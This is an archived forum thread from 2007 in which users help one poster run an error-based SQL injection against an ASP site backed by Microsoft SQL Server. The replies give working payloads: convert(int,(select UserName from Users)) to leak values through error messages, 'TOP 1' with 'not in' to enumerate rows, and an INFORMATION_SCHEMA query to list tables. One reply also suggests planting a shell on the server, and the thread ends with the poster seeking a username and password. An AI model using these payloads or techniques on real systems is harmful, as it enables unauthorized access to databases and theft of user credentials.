PDA

Просмотр полной версии : help !! sql+asp


Patriot_Sa
16.11.2007, 06:36
hey../

Ask our inquiry last sql asp

Show me this talk Look

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.

/AR/Main/Calendar_CheckMonth.asp, line 130


It is user:
convert(int,+(select+UserName+from+Users));--

What can I do? :confused: :confused: :confused:

Sn@k3
16.11.2007, 10:37
convert(int+(select+UserName+from+pass));--

there are tables (User etc or try namr db UserName etc) what chek
Try to throw Shell on a server, if I have correctly understood you.

Scipio
16.11.2007, 17:19
Я по аглицки писать не умею, но попробую

Use "TOP 1" in your Select query
Example:
id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)

try:
convert(int,+(select+TOP 1+UserName+from+Users));--

Then, using a construction: "where..not in "

Patriot_Sa
17.11.2007, 01:54
thanx Sn@k3 ,Scipio

It is user:
convert(int,+(select+TOP 1+UserName+from+Users));--

Noon me user and password ^_^